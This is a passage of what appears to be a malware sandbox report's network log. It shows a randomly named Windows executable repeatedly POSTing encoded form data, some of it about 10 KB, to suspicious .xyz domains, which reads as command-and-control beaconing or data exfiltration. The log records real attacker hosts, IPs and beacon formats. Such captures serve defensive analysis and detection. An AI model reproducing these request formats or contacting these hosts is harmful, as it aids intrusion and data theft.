Jan 15, 2025 19:42:05.958714962 CET	826	OUT	POST /t4o7/ HTTP/1.1 Host: www.l33900.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.l33900.xyz Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.l33900.xyz/t4o7/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 6a 4c 69 68 72 46 51 46 44 66 72 4a 33 4d 51 41 6e 6d 42 74 56 70 42 75 4a 69 57 38 53 35 39 2b 4c 51 37 44 62 43 42 76 51 2b 67 59 64 6f 5a 30 78 34 59 78 39 31 41 58 74 77 4b 4e 77 74 6e 7a 34 72 6b 4c 79 4c 7a 52 36 32 66 58 54 58 59 72 4b 66 51 34 6c 4f 36 42 31 50 2b 67 6a 76 73 62 44 4a 31 67 46 33 33 64 58 31 41 6e 4b 44 69 78 6a 72 78 74 31 39 59 70 75 4a 35 68 49 6d 67 78 67 41 71 65 64 5a 53 48 41 72 73 41 77 73 4f 44 55 37 71 65 48 38 56 48 65 62 45 48 58 6e 4f 54 31 64 32 6d 33 51 30 79 4f 66 44 38 72 62 72 69 6c 6e 63 6f 51 35 51 48 52 66 59 70 48 6f 4b 68 50 48 77 37 72 35 2f 4c 53 7a 6d 65 39 31 6f 44 6a 46 66 44 51 6c 55 3d Data Ascii: PZtTT8P0=jLihrFQFDfrJ3MQAnmBtVpBuJiW8S59+LQ7DbCBvQ+gYdoZ0x4Yx91AXtwKNwtnz4rkLyLzR62fXTXYrKfQ4lO6B1P+gjvsbDJ1gF33dX1AnKDixjrxt19YpuJ5hImgxgAqedZSHArsAwsODU7qeH8VHebEHXnOT1d2m3Q0yOfD8rbrilncoQ5QHRfYpHoKhPHw7r5/LSzme91oDjFfDQlU=
Jan 15, 2025 19:42:06.530529976 CET	455	IN	HTTP/1.1 302 Redirect Content-Type: text/html; charset=UTF-8 Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=64819/t4o7/ Server: Microsoft-IIS/10.0 Date: Wed, 15 Jan 2025 18:42:05 GMT Connection: close Content-Length: 200 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 36 34 38 31 39 2f 74 34 6f 37 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&topId=64819/t4o7/"></a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	64448	162.218.30.235	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:42:08.507337093 CET	10908	OUT	POST /t4o7/ HTTP/1.1 Host: www.l33900.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.l33900.xyz Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.l33900.xyz/t4o7/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 6a 4c 69 68 72 46 51 46 44 66 72 4a 33 4d 51 41 6e 6d 42 74 56 70 42 75 4a 69 57 38 53 35 39 2b 4c 51 37 44 62 43 42 76 51 2b 6f 59 64 62 52 30 77 62 77 78 38 31 41 58 6c 51 4b 4d 77 74 6d 76 34 71 4d 58 79 4c 2b 6d 36 31 33 58 52 79 4d 72 64 2b 51 34 2f 65 36 42 2b 76 2b 6a 6e 76 73 4f 44 4a 6c 6b 46 7a 62 64 58 31 41 6e 4b 46 4f 78 71 66 6c 74 7a 39 59 71 72 4a 35 6c 44 47 68 55 67 41 6a 70 64 5a 57 49 41 36 4d 41 78 4d 65 44 57 4a 79 65 61 4d 56 4a 58 4c 46 61 58 6e 4c 54 31 65 54 64 33 56 68 70 4f 66 33 38 70 2f 2b 50 31 30 63 53 46 6f 67 6a 44 75 45 2f 4c 62 75 44 41 56 59 78 6f 71 37 72 51 54 61 63 33 55 5a 4a 35 30 50 56 4b 43 42 47 50 6e 6c 4a 44 78 77 46 54 4a 71 33 43 65 46 69 48 33 57 56 30 6a 6f 74 59 4b 31 47 6e 54 45 57 77 75 7a 54 79 42 6d 45 41 6f 45 2b 47 59 6a 78 46 57 71 76 79 54 42 5a 4b 63 59 6c 73 54 72 46 67 6b 4d 51 5a 6a 62 4b 4d 44 48 31 51 65 75 57 46 74 74 54 36 34 35 74 32 54 2f 4a 67 67 71 71 78 63 51 41 74 62 6c 69 58 6b 76 32 6e 74 37 69 69 [TRUNCATED] Data Ascii: PZtTT8P0=jLihrFQFDfrJ3MQAnmBtVpBuJiW8S59+LQ7DbCBvQ+oYdbR0wbwx81AXlQKMwtmv4qMXyL+m613XRyMrd+Q4/e6B+v+jnvsODJlkFzbdX1AnKFOxqfltz9YqrJ5lDGhUgAjpdZWIA6MAxMeDWJyeaMVJXLFaXnLT1eTd3VhpOf38p/+P10cSFogjDuE/LbuDAVYxoq7rQTac3UZJ50PVKCBGPnlJDxwFTJq3CeFiH3WV0jotYK1GnTEWwuzTyBmEAoE+GYjxFWqvyTBZKcYlsTrFgkMQZjbKMDH1QeuWFttT645t2T/JggqqxcQAtbliXkv2nt7ii+Ta/8yaV7Jl1ELY1XMJIJv9RHd/DjWBFrTNWXLfJ/CVNaC4XNrhXfen2IUdFEhycznyCVgTMNxam6yosBWeyaruI3nlSZXfLloW8HztgMTW45qIjxIfDA82rwDZTp/mSwN/sbRmxxptydwycAHBjPUY8hhYBy6m/bnexk39HW9xNY8YEPjdG6BeKIqKooENjBtSXExxhgAVldOJwE3v3+aiTI0LPkAQKbslU6EM0dpjl/mgRYt7g4BYs1LCZewT9nDv+Wyp9SGPQMK571Y/MjPEH2sCbi8cESK/e60T8Jz7TotjjQsBBWZ9QBW4FC48RlI0Ap5EykpKNjMQ9rt9mx5zfu30R1BQrEukNgrLAPHmaepla4GBhjuFZvO+tlsm4PDLTTfeARxvBwUvZPImQab8Nd9mfag/zuKhcuzO4+mxLociIoE5vs8fzbYQKE20BPR8aIGpo7lO1B3hRVJJJKHkmpFzHfXHH4zNg/9p2w2M3T433bfyrotTrSPDsYfoUJFhR3poUhq4CFMiVxM2i7bzA1fmA6GPDr71MImv+jKQKuzULPIzkKVmczCyDAHi66eCmpgeN0TP3GVSE5gwM/5BrEgWZClmKlV8Y/SznE51ewTq5DpUg+fH2oOZ4E+1qWxuO8/owzm4+xxCaC71ycE19iYPy7jmz6/ [TRUNCATED]
Jan 15, 2025 19:42:09.091219902 CET	455	IN	HTTP/1.1 302 Redirect Content-Type: text/html; charset=UTF-8 Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=64819/t4o7/ Server: Microsoft-IIS/10.0 Date: Wed, 15 Jan 2025 18:42:08 GMT Connection: close Content-Length: 200 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 36 34 38 31 39 2f 74 34 6f 37 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&topId=64819/t4o7/"></a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	64449	162.218.30.235	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:42:11.044707060 CET	550	OUT	GET /t4o7/?PZtTT8P0=uJKBo1tKDv7YsektomxAe6xLUzKhSocRURbZYBlCa5gveKZ37rsA10kLqgKMu7eO65AngIyj7yeUeCYZeYghmIfm5PSli+U+Ur1GTnr4eXI8Tij3papz9cQ=&-HT0=eZZx0LUhp4u8Nb7 HTTP/1.1 Host: www.l33900.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Jan 15, 2025 19:42:11.656708956 CET	455	IN	HTTP/1.1 302 Redirect Content-Type: text/html; charset=UTF-8 Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=64819/t4o7/ Server: Microsoft-IIS/10.0 Date: Wed, 15 Jan 2025 18:42:11 GMT Connection: close Content-Length: 200 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 36 34 38 31 39 2f 74 34 6f 37 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&topId=64819/t4o7/"></a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	64450	104.21.32.1	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:42:16.711601019 CET	833	OUT	POST /sbv2/ HTTP/1.1 Host: www.cikolatasampuan.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.cikolatasampuan.xyz Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.cikolatasampuan.xyz/sbv2/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 48 41 6d 33 6d 4e 79 49 4e 52 35 6e 2b 4d 4a 4c 6f 49 78 6a 61 54 59 69 38 74 2b 56 41 68 57 4d 66 4e 39 53 55 76 55 30 47 71 55 76 41 33 71 78 4d 74 4e 63 69 51 41 65 42 7a 64 35 71 44 2f 52 61 68 6a 6c 42 65 4e 58 76 5a 70 64 6e 50 64 2f 30 4b 77 41 67 72 59 2b 66 4b 33 79 4e 52 4e 4b 68 43 48 71 37 68 37 62 33 53 2f 50 70 59 67 34 76 6c 62 75 30 75 6e 45 58 4e 50 58 67 63 53 59 51 68 64 41 31 58 70 45 47 7a 4a 36 41 30 50 68 41 41 5a 56 4e 6a 70 33 2f 46 35 48 54 70 69 5a 57 45 75 7a 63 32 30 4f 2b 67 63 43 79 4c 51 36 4e 53 52 50 34 2f 65 55 41 78 65 70 66 47 4a 6c 74 41 3d 3d Data Ascii: PZtTT8P0=HAm3mNyINR5n+MJLoIxjaTYi8t+VAhWMfN9SUvU0GqUvA3qxMtNciQAeBzd5qD/RahjlBeNXvZpdnPd/0KwAgrY+fK3yNRNKhCHq7h7b3S/PpYg4vlbu0unEXNPXgcSYQhdA1XpEGzJ6A0PhAAZVNjp3/F5HTpiZWEuzc20O+gcCyLQ6NSRP4/eUAxepfGJltA==
Jan 15, 2025 19:42:17.327960968 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 18:42:17 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xKvBkh9mpis8jnTG8LDpPPWCA5MSFwsiIUX5WFy3Ob2DFQ52CypHSgWrPtdc3HObqvSUjlHECVNHjBaz1lBF%2BQazl9n5PqlDyvbQ4q%2BIj7sYKhWtVf8tfdb9wTMKDkvjT3nuI7p4Wv%2FQdA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90280138dcae1875-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1478&rtt_var=739&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=833&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 62 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 94 5d 6f d3 30 14 86 ef f7 2b 0e 41 20 90 48 dc b4 1b a3 49 1a 69 b4 9b 40 e2 63 82 22 e0 d2 4b 4e 63 b3 c4 0e f6 69 da 30 f1 df 91 93 ac ed f8 12 17 38 37 ce f1 eb e7 3d 27 f6 49 72 6f f1 76 be fc 7c 79 0e 82 aa 12 2e 3f 3c 7f f5 72 0e 9e cf d8 c7 c9 9c b1 c5 72 01 9f 5e 2c 5f bf 82 30 18 c1 7b 32 32 23 c6 ce df 78 e0 09 a2 3a 62 6c b3 d9 04 9b 49 a0 4d c1 96 ef d8 d6 51 42 b7 6d 98 fa b6 db 13 e4 94 7b e9 51 d2 99 6c ab 52 d9 d9 6f 00 e1 74 3a ed f7 79 4e 14 95 5c 15 33 0f 95 07 bb 59 9a 08 e4 79 7a 04 00 90 90 a4 12 d3 e3 d1 31 3c ac 72 6e 45 0c 97 bc 40 78 a3 09 2e f4 5a e5 09 eb 15 bd ba 42 e2 e0 4c 7d fc ba 96 cd cc 9b 6b 45 a8 c8 5f b6 35 7a 90 f5 6f 33 8f 70 4b cc 25 11 43 26 b8 b1 48 b3 0f cb 0b ff 99 c7 0e 41 8a 57 38 f3 72 b4 99 91 35 49 ad 0e 08 2e 23 ff a7 5c 76 bb 2d b5 25 02 b5 35 0e 56 99 b5 5e bf e6 c6 95 ce 5b b8 59 69 45 be 95 df 30 0a 8f eb 6d 0c 99 2e b5 89 ee 9f 76 23 86 6e 79 c5 2b 59 b6 11 37 92 97 31 38 94 cf 4b 59 a8 28 43 45 [TRUNCATED] Data Ascii: 2ba]o0+A HIi@c"KNci087='Irov\|y.?<rr^,_0{22#x:blIMQBm{QlRot:yN\3Yyz1<rnE@x.ZBL}kE_5zo3pK%C&HAW8r5I.#\v-%5V^[YiE0m.v#ny+Y718KY(CEh;E7T-sM`HbolP"eCDh\|
Jan 15, 2025 19:42:17.327986002 CET	319	IN	Data Raw: 5b f3 4c aa 22 02 3f 74 c2 5b 7b 7f d2 d9 4f a6 f5 f6 c0 bf 86 9b 8d cc 49 44 93 d3 13 a7 fe b5 d8 01 e0 97 b8 a2 88 af 49 c7 43 c0 74 de 5d e4 56 43 ba 8e 60 e2 ea dc 3b e4 b2 f9 2f 1e 7b 22 8f 4a a9 ae f7 df 6d 72 7c 32 79 7a 76 47 d0 48 2b 09 Data Ascii: [L"?t[{OIDICt]VC`;/{"Jmr\|2yzvGH+jxFJnAG'qlupWf.9qzUm1/M4a<MX=D0a"[Q\6Sz4dZ y& hAiJK5O$B^CX\X]t8W<v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	64451	104.21.32.1	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:42:19.264206886 CET	853	OUT	POST /sbv2/ HTTP/1.1 Host: www.cikolatasampuan.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.cikolatasampuan.xyz Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.cikolatasampuan.xyz/sbv2/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 48 41 6d 33 6d 4e 79 49 4e 52 35 6e 78 4e 35 4c 70 76 74 6a 57 6a 59 6c 32 4e 2b 56 56 78 57 32 66 4e 68 53 55 71 30 65 47 59 77 76 44 56 43 78 4e 6f 68 63 68 51 41 65 5a 44 64 38 75 44 2f 61 61 68 6e 44 42 63 70 58 76 5a 39 64 6e 4b 5a 2f 7a 39 6b 50 79 4c 59 77 42 71 33 38 44 78 4e 4b 68 43 48 71 37 68 2f 69 33 53 33 50 70 6f 77 34 73 42 50 76 72 65 6e 44 65 74 50 58 71 4d 53 55 51 68 63 6c 31 57 6c 75 47 32 46 36 41 77 66 68 44 52 5a 61 45 6a 70 78 69 31 35 57 51 70 65 58 5a 6c 62 72 53 33 45 42 77 6a 6c 75 2b 74 64 67 63 6a 77 59 71 2f 36 6e 64 32 58 64 53 46 30 73 32 45 30 45 66 36 74 45 64 78 58 50 37 4f 63 58 68 45 61 62 32 57 4d 3d Data Ascii: PZtTT8P0=HAm3mNyINR5nxN5LpvtjWjYl2N+VVxW2fNhSUq0eGYwvDVCxNohchQAeZDd8uD/aahnDBcpXvZ9dnKZ/z9kPyLYwBq38DxNKhCHq7h/i3S3Ppow4sBPvrenDetPXqMSUQhcl1WluG2F6AwfhDRZaEjpxi15WQpeXZlbrS3EBwjlu+tdgcjwYq/6nd2XdSF0s2E0Ef6tEdxXP7OcXhEab2WM=
Jan 15, 2025 19:42:19.873476028 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 18:42:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eZ60YhbDIimWR5csHs6fRhf%2FKR5pKnJcOmZQNDMX6Kp4IFN6qtC245dYRpBHrjbF1T%2Fo5qz66X%2Fb3FmpzQGEuOQoJ0EQcjESCUT1iJ9f%2FTgCU3gd7PHEB9KuS8UZyl9MioE1J3PY5DYf1w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90280148ea3fc327-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1463&rtt_var=731&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=853&delivery_rate=0&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 94 5d 6f d3 30 14 86 ef f7 2b 0e 41 20 90 48 dc b4 1b a3 49 1a 69 b4 9b 40 e2 63 82 22 e0 d2 4b 4e 63 b3 c4 0e f6 69 da 30 f1 df 91 93 ac ed f8 12 17 38 37 ce f1 eb e7 3d 27 f6 49 72 6f f1 76 be fc 7c 79 0e 82 aa 12 2e 3f 3c 7f f5 72 0e 9e cf d8 c7 c9 9c b1 c5 72 01 9f 5e 2c 5f bf 82 30 18 c1 7b 32 32 23 c6 ce df 78 e0 09 a2 3a 62 6c b3 d9 04 9b 49 a0 4d c1 96 ef d8 d6 51 42 b7 6d 98 fa b6 db 13 e4 94 7b e9 51 d2 99 6c ab 52 d9 d9 6f 00 e1 74 3a ed f7 79 4e 14 95 5c 15 33 0f 95 07 bb 59 9a 08 e4 79 7a 04 00 90 90 a4 12 d3 e3 d1 31 3c ac 72 6e 45 0c 97 bc 40 78 a3 09 2e f4 5a e5 09 eb 15 bd ba 42 e2 e0 4c 7d fc ba 96 cd cc 9b 6b 45 a8 c8 5f b6 35 7a 90 f5 6f 33 8f 70 4b cc 25 11 43 26 b8 b1 48 b3 0f cb 0b ff 99 c7 0e 41 8a 57 38 f3 72 b4 99 91 35 49 ad 0e 08 2e 23 ff a7 5c 76 bb 2d b5 25 02 b5 35 0e 56 99 b5 5e bf e6 c6 95 ce 5b b8 59 69 45 be 95 df 30 0a 8f eb 6d 0c 99 2e b5 89 ee 9f 76 23 86 6e 79 c5 2b 59 b6 11 37 92 97 31 38 94 cf 4b 59 a8 28 43 45 [TRUNCATED] Data Ascii: 2c5]o0+A HIi@c"KNci087='Irov\|y.?<rr^,_0{22#x:blIMQBm{QlRot:yN\3Yyz1<rnE@x.ZBL}kE_5zo3pK%C&HAW8r5I.#\v-%5V^[YiE0m.v#ny+Y718KY(CEh;E7T-sM`HbolP"eCD
Jan 15, 2025 19:42:19.873493910 CET	316	IN	Data Raw: 68 7c 5b f3 4c aa 22 02 3f 74 c2 5b 7b 7f d2 d9 4f a6 f5 f6 c0 bf 86 9b 8d cc 49 44 93 d3 13 a7 fe b5 d8 01 e0 97 b8 a2 88 af 49 c7 43 c0 74 de 5d e4 56 43 ba 8e 60 e2 ea dc 3b e4 b2 f9 2f 1e 7b 22 8f 4a a9 ae f7 df 6d 72 7c 32 79 7a 76 47 d0 48 Data Ascii: h\|[L"?t[{OIDICt]VC`;/{"Jmr\|2yzvGH+jxFJnAG'qlupWf.9qzUm1/M4a<MX=D0a"[Q\6Sz4dZ y& hAiJK5O$B^CX\X]t8W<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	64452	104.21.32.1	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:42:21.814934015 CET	10935	OUT	POST /sbv2/ HTTP/1.1 Host: www.cikolatasampuan.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.cikolatasampuan.xyz Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.cikolatasampuan.xyz/sbv2/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 48 41 6d 33 6d 4e 79 49 4e 52 35 6e 78 4e 35 4c 70 76 74 6a 57 6a 59 6c 32 4e 2b 56 56 78 57 32 66 4e 68 53 55 71 30 65 47 59 34 76 44 6d 36 78 4d 4c 35 63 67 51 41 65 51 6a 64 39 75 44 2f 48 61 6c 4c 50 42 63 6b 31 76 62 46 64 6d 73 6c 2f 79 4d 6b 50 34 4c 59 77 62 4b 33 78 4e 52 4e 66 68 43 33 75 37 68 76 69 33 53 33 50 70 71 34 34 36 6c 62 76 34 4f 6e 45 58 4e 50 6c 67 63 53 34 51 68 30 54 31 57 68 55 47 43 35 36 41 51 50 68 51 58 4e 61 4c 6a 70 7a 68 31 34 4c 51 70 54 56 5a 6c 48 6e 53 33 78 73 77 6b 46 75 75 4a 4d 66 47 43 63 30 30 4e 69 50 4a 52 4c 65 4c 33 4e 31 36 44 6c 37 59 4a 74 38 43 77 7a 45 37 4e 6b 65 2f 57 43 42 76 52 56 79 47 46 59 30 32 2b 76 50 64 38 39 32 67 79 61 76 54 41 68 43 67 45 4a 6b 47 51 6d 42 65 39 6f 79 34 2b 6a 4a 55 6d 35 38 2f 72 63 6e 53 77 51 6d 63 6a 42 50 4c 47 75 4d 66 4d 6b 2f 58 72 64 73 4a 73 49 30 39 63 78 67 72 4f 46 4c 75 6e 31 48 52 63 79 4b 39 54 56 54 54 74 69 44 72 72 6c 5a 56 2f 74 7a 70 6c 39 73 37 30 72 76 57 48 71 36 4b [TRUNCATED] Data Ascii: PZtTT8P0=HAm3mNyINR5nxN5LpvtjWjYl2N+VVxW2fNhSUq0eGY4vDm6xML5cgQAeQjd9uD/HalLPBck1vbFdmsl/yMkP4LYwbK3xNRNfhC3u7hvi3S3Ppq446lbv4OnEXNPlgcS4Qh0T1WhUGC56AQPhQXNaLjpzh14LQpTVZlHnS3xswkFuuJMfGCc00NiPJRLeL3N16Dl7YJt8CwzE7Nke/WCBvRVyGFY02+vPd892gyavTAhCgEJkGQmBe9oy4+jJUm58/rcnSwQmcjBPLGuMfMk/XrdsJsI09cxgrOFLun1HRcyK9TVTTtiDrrlZV/tzpl9s70rvWHq6K3AUgrKcvBqwWbrBK93jAfBCm0eZ9gJY4Ks5VJEdXqyNUIFar9h9Tum4idu/6eYPcCd6gLyWDLVanwWjUgP3HNJ+bRRdqVK0AnNShosgeTDIlcm42PbMeec6g2BR9vkCbeolYgI9QFBftrPeLGm60m6B51xQuZm2X7QAHqICRch/raZpgL5rL8dqj9fmP5ay1DpomQKePNU4oUb1LvM2ALUIaBvF37hP4pH6ReNpG212qiKH7Hl6rkjLdZoy9l770ks5VVb76iiiJT3GrcQZ4zFMaU8z+y3f9fs69jH7pnplvlxJiWX/JCoq6Ufvm5Ls8BlTzK+DE6gfEkTEMa1A16eb2l2jIQEVsRWWn1t0Wj6KwSu8bl+F7BNN3/kJ4Whc1PHWxnY42gzoUi2+xmMpZMGPB7G8dyppovXKeQ2peHSlRcFl6Qs76PraqHVoOPjrMmQN4BHtW2d83E4dHzJuM6hBxs1ONAKkAsmLPyu8V5MmgC5l9Z7cl6YfZ2itaW2JOXObPq20tvXSEXVZeG2aRnWgwRMXzNaH+Uqeu/abcHJ9NetltGYbWTmAwcQtHAnPknYtF1odX1JAu9gjt8yuEwZ6Qpq08E99ZQf0F+celrbMQyh6pVr9d2Fona+FZGg8iDdXJU9rS0ByPuBMf5llmU9LiTnFJoxK2iF [TRUNCATED]
